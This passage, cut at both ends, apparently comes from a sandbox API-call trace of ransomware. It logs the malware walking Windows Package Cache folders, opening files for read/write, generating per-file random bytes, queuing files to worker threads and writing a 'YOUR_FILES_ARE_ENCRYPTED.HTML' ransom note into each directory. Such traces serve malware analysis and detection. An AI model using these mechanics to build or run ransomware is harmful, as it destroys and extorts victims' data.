ftCreationTime.dwLowDateTime=0x3888e6f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388bfa11, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388bfa11, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0109.117] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf833b400, ftCreationTime.dwHighDateTime=0x1ced524, ftLastAccessTime.dwLowDateTime=0xf833b400, ftLastAccessTime.dwHighDateTime=0x1ced524, ftLastWriteTime.dwLowDateTime=0xf833b400, ftLastWriteTime.dwHighDateTime=0x1ced524, nFileSizeHigh=0x0, nFileSizeLow=0xc89b1, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0109.117] StrStrIW (lpFirst="cab1.cab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.117] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0109.117] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0109.117] lstrlenW (lpString=".cab") returned 4 [0109.117] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0109.117] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0109.118] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0109.207] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=821681) returned 1 [0109.207] GetProcessHeap () returned 0x600000 [0109.207] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3163dd0 [0109.210] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="B5") returned 2 [0109.210] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="2D") returned 2 [0109.210] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="1C") returned 2 [0109.210] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="80") returned 2 [0109.210] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="C4") returned 2 [0109.210] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="38") returned 2 [0109.210] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="B5") returned 2 [0109.210] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="8B") returned 2 [0109.210] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="BB") returned 2 [0109.210] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="8D") returned 2 [0109.210] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="08") returned 2 [0109.210] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="42") returned 2 [0109.210] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="A0") returned 2 [0109.210] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="0B") returned 2 [0109.210] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="13") returned 2 [0109.210] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="FA") returned 2 [0109.210] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="19") returned 2 [0109.210] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="2A") returned 2 [0109.210] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="82") returned 2 [0109.210] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="3D") returned 2 [0109.210] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="99") returned 2 [0109.210] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="58") returned 2 [0109.210] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="1F") returned 2 [0109.210] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="50") returned 2 [0109.210] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="83") returned 2 [0109.210] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="17") returned 2 [0109.210] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="B2") returned 2 [0109.210] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="B3") returned 2 [0109.211] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="1B") returned 2 [0109.211] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="31") returned 2 [0109.211] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="25") returned 2 [0109.211] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="7D") returned 2 [0109.211] lstrcpyW (in: lpString1=0x3173e84, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0109.211] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x3163dd0, NumberOfConcurrentThreads=0x0) returned 0x274 [0109.211] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3163dd0, lpOverlapped=0x3163dd0) returned 1 [0109.211] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0109.211] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.211] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0109.211] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0109.212] lstrlenW (lpString=".msi") returned 4 [0109.212] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0109.212] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0109.212] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0109.212] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0109.212] GetProcessHeap () returned 0x600000 [0109.212] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0109.212] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0109.218] WriteFile (in: hFile=0x308, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0109.219] CloseHandle (hObject=0x308) returned 1 [0109.220] GetProcessHeap () returned 0x600000 [0109.220] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0109.220] GetProcessHeap () returned 0x600000 [0109.220] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0109.220] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3888e6f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388bfa11, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388bfa11, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1088, dwReserved1=0x623f60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0109.220] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 [0109.220] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0109.220] GetProcessHeap () returned 0x600000 [0109.221] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0109.221] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0109.222] WriteFile (in: hFile=0x30c, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0109.222] CloseHandle (hObject=0x30c) returned 1 [0109.223] GetProcessHeap () returned 0x600000 [0109.223] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0109.223] GetProcessHeap () returned 0x600000 [0109.223] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.224] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3888e6f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x3888e6f3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x3888e6f3, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 0 [0109.224] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0109.224] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0109.224] GetProcessHeap () returned 0x600000 [0109.224] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0109.225] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0109.225] WriteFile (in: hFile=0x314, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0109.226] CloseHandle (hObject=0x314) returned 1 [0109.226] GetProcessHeap () returned 0x600000 [0109.227] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0109.227] GetProcessHeap () returned 0x600000 [0109.227] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0109.227] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f2d0b1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f2d0b1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44f2d0b1, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", cAlternateFileName="{CA675~1")) returned 1 [0109.227] StrStrIW (lpFirst="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.227] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned 71 [0109.227] GetProcessHeap () returned 0x600000 [0109.227] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0109.228] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" [0109.228] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*" [0109.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f2d0b1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f2d0b1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44f2d0b1, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.229] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f2d0b1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f2d0b1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44f2d0b1, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0109.229] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44f2d0b1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f2d0b1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xa0211772, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x272, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0109.229] StrStrIW (lpFirst="state.rsm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.229] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned 81 [0109.229] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0109.229] lstrlenW (lpString=".rsm") returned 4 [0109.229] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0109.229] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44f2d0b1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f2d0b1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x39d18a7e, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x6f398, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0109.229] StrStrIW (lpFirst="vcredist_x64.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.229] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned 88 [0109.229] PathFindExtensionW (pszPath="vcredist_x64.exe") returned=".exe" [0109.229] lstrlenW (lpString=".exe") returned 4 [0109.229] PathFindExtensionW (pszPath="vcredist_x64.exe") returned=".exe" [0109.229] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44f2d0b1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f2d0b1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x39d18a7e, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x6f398, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0109.229] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.229] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0109.229] GetProcessHeap () returned 0x600000 [0109.229] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0109.230] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0109.232] WriteFile (in: hFile=0x314, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0109.233] CloseHandle (hObject=0x314) returned 1 [0109.233] GetProcessHeap () returned 0x600000 [0109.233] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0109.233] GetProcessHeap () returned 0x600000 [0109.233] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0109.234] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f79386, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f9f6d5, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44f9f6d5, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", cAlternateFileName="{CF2BE~1.610")) returned 1 [0109.234] StrStrIW (lpFirst="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.234] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned 82 [0109.234] GetProcessHeap () returned 0x600000 [0109.234] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0109.235] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" [0109.235] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*" [0109.235] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f79386, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f9f6d5, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44f9f6d5, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0109.235] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f79386, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f9f6d5, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44f9f6d5, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0109.235] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f9f6d5, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f9f6d5, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44f9f6d5, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 1 [0109.235] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.235] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned 91 [0109.235] GetProcessHeap () returned 0x600000 [0109.235] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.236] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages" [0109.236] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package 